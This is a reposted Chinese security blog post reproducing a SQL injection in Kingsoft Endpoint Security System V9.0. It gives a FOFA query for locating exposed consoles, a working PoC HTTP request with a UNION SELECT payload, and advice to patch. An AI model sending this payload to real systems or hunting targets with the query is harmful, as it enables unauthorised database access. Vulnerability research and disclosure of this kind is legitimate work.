“ 人性的背后是白云苍狗,愿你我都是生活的高手。”
免责声明:文章中内容来源于互联网,涉及的所有内容仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为。利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不承担任何法律及连带责任!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!
0x00.产品介绍
金山终端安全系统是一款为企业提供终端防护的安全产品,针对恶意软件、病毒和外部攻击提供防范措施,帮助维护企业数据和网络。
0x01.漏洞介绍
该漏洞是由于金山终端安全系统未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。
0x02.影响版本
金山终端安全系统<V9.SP1.E1008
0x03.漏洞复现
FOFA:app="金山终端安全系统V9.0Web控制台"
poc如下
POST /inter/update_software_info_v2.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
type=-1+UNION+SELECT+1,user(),3,4,5,6,7,8--&key=&pageCount=0&curPage=
0x04.修复建议
官方已经推出了新版本修复了漏洞。建议所有受影响的用户尽快访问官方网站,更新版本至新版本。
https://www.ejinshan.net/lywz/index
0x05.PS
新建了一个网络安全技术交流群师傅们可在群里吹水和技术交流,感兴趣的师傅可扫二维码拉你入群qwq
遵守网络安全法,请勿用于非法入侵,仅供学习
原文始发于微信公众号(深白网安):X山终端安全系统V9.0 SQL注入复现(附POC)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论